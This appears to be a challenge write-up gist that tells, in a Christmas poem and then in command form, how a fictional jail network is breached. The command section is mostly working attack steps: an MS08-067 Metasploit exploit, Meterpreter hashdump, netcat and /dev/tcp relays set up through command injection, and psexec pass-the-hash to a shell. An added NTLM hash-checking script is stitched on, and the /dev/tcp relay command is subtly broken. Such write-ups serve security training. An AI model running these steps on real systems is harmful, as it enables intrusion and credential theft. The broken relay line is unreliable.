@iagox86
Created October 27, 2023 18:24
This is my response to Ed Skoudis' challenge, "Santa Claus is Hacking, to Town!"
http://www.ethicalhacker.net/content/view/218/2/
First, a poem that describes the situation and then the solution. Then, the boring part: the commands and results in non-poem form.
------------
'twas the night before Christmas and Kris was in jail
And his friends were upset because they couldn't make bail
"202c," they said, "how could that be done?"
"I thought we were in Canada, with 342.1?"
They tried to find Sombertown on Google maps
But Javascript was required, so they couldn't find crap
Meanwhile Santa, who was trapped in his cell,
Fires up his Mac to see what he can tell
"Now ping, now traceroute, now metasploit and Nmap!
On cain, on able, on wireshark and netcat!"
Ere it was booted, Jessica asked if it was hard
To sneak his macbook past the prison guard
"No problem!" said Kris, "I do it every day!"
"This Macbook is barely a computer anyway!"
Just then, the jailmaster walked to his box
Past the server that could open the locks
Jailmaster logged on with his password from hell
But what it was, Kris could not tell
Now that his macbook was finally booted,
Kris tried using Nmap to find the computer
"Lo! What's this?" he said with a grin
Another box showed up as he scratched his chin
"Laptop and web1 I can see from this box"
"I wonder what web1 would tell firefox?"
Opening his browser Kris giggled with glee
As he typed shell commands into form #3
"Shell injection? That's so totally cool!"
Said Kris as he fired up his metasploit tool
Kris wondered if the laptop would fall to '067?
And as the shell popped up, he said "I'm in heaven!"
Now with two boxes under full control,
Kris had to find a way to open the door!
"What tools do we have?" asked Kris with a grin
"With Nmap and Netcat we'll surely get in!"
"Psexec," said Jessica, "metasploit, and netcat"
"One tool under 1 meg, and of course Nmap"
"One tool?" laughed Kris, "just download some LOLCats"
"I already have enough to do my l33t hacks"
"You can keep your psexec program too!"
So poor Mr. Warlock had nothing to do
Firing up metasploit[1] with a glance at the guard table,
Kris selected meterpreter as the payload
"use priv" he ran, and "hashdump" too
With the hashes in hand he knew what to do
With a wave of his hand and no delay,
On his macbook he created a netcat relay[2]
Then on Web1, quick as could be
He set up a relay with /dev/tcp[3]
"Wow" said Jessica, as Kris still typed,
Tools like Core Impact are way overhyped!
Running metasploit[4] on his laptop he knew what to do next,
Setting RHOST to "local" and exploit to "psexec"
SMBUser was "jailmaster" and SMBPass was "aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f"
After all that typing, Kris said, that's enough!
Recognizing the hash encoded with NTLM,
The prison door computer let Kris's connection in
When the door clicked open they let out a shout!
Thanks to Kris, they'd all gotten out!
And while he was doing this, what did Winter Warlock do?
He downloaded I Can Has Cheezburger, and enjoyed it too!
------------------
That was the poem version; here are more detailed writeups of the commands:
[1] metasploit (1)
Kris used metasploit to get into the jailmaster's computer:
$ metasploit
> use exploit/windows/smb/ms08_067_netapi
> set RHOST jailmasterlaptop
> set PAYLOAD windows/meterpreter/bind_tcp
> exploit
Once Meterpreter was running, he loaded the 'priv' extension and used 'hashdump' to get the list of hashes:
meterpreter > use priv
meterpreter > hashdump
jailmaster:1006:aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f:::
[2] netcat relay
Kris uses a netcat relay on his macbook (I guess on the Linux VM) to listen for connections from two sources, and link them together:
$ mknod pipe p
$ cat pipe | nc -l -p 4444 | nc -l -p 5555 > pipe
[3] /dev/tcp relay
Kris creates a /dev/tcp relay using the OS command injection vulnerability he found (I figured this was better than assuming that his netcat version would run on the remote system). He does it basically the same way; note that /dev/tcp is a bash-only redirection target, not an executable, so this only works where bash is the shell:
$ mknod pipe p
$ cat pipe | /dev/tcp/santaslaptop/5555 | /dev/tcp/doorcomputer/445 > pipe
Now, any program that connects to santaslaptop:4444 will be connected through to doorcomputer:445.
If that doesn't work (i.e., the system is locked down and /dev/tcp doesn't exist), then Kris would have to get Netcat off his laptop (using wget or telnet or something) and create a second netcat relay:
$ mknod pipe p
$ cat pipe | nc santaslaptop 5555 | nc doorcomputer 445 > pipe
[4] metasploit (2)
Finally, Kris uses metasploit's psexec exploit along with the hash he pulled to gain access.
$ metasploit
> use windows/smb/psexec
> set RHOST localhost
> set RPORT 4444
> set PAYLOAD windows/shell/bind_tcp
> set SMBUser jailmaster
> set SMBPass aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f
msf exploit(psexec) > exploit
C:\WINNT\system32>
With shell access to the doorcomputer (at the jailmaster's level), Kris runs dooropen.exe and they all escape!
(Oh, and for what it's worth, the hash I used represents 50 'a's. If I had to type a 50-character password, that's what I'd be using! :) )
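As an added example (not part of the gist), a small Python script that parses the hashdump line quoted above and recomputes NTLM hashes from candidate passwords. NTLM is unsalted MD4 over the UTF-16LE password, which is why a dumped NT hash is a password equivalent for psexec and why defenders care about NTLM hash exposure; the script checks the author's "50 'a's" claim in its output rather than assuming it.

```python
import struct

# LM hash of the empty password: its presence means LM hash storage is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). NTLM is MD4 over the UTF-16LE password, unsalted."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # message bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (round function, additive constant, word order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         tuple(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, order, shifts in rounds:
            for i, j in enumerate(order):
                t = (a + f(b, c, d) + x[j] + k) & MASK
                s = shifts[i % 4]
                a, b, c, d = d, ((t << s) | (t >> (32 - s))) & MASK, b, c  # rotate roles
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def ntlm_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()

def parse_hashdump_line(line: str) -> dict:
    """Split a 'user:rid:lm:nt:::' line as printed by hashdump."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM}

def password_matches(line: str, candidate: str) -> bool:
    """True if candidate is the password behind the NT hash on this line."""
    return ntlm_hash(candidate) == parse_hashdump_line(line)["nt"]

# The hashdump line quoted in the writeup above.
JAILMASTER_LINE = "jailmaster:1006:aad3b435b51404eeaad3b435b51404ee:d3ec7135d0caab12139108c13e7da38f:::"

if __name__ == "__main__":
    print(parse_hashdump_line(JAILMASTER_LINE))
    print("50 x 'a' matches:", password_matches(JAILMASTER_LINE, "a" * 50))
```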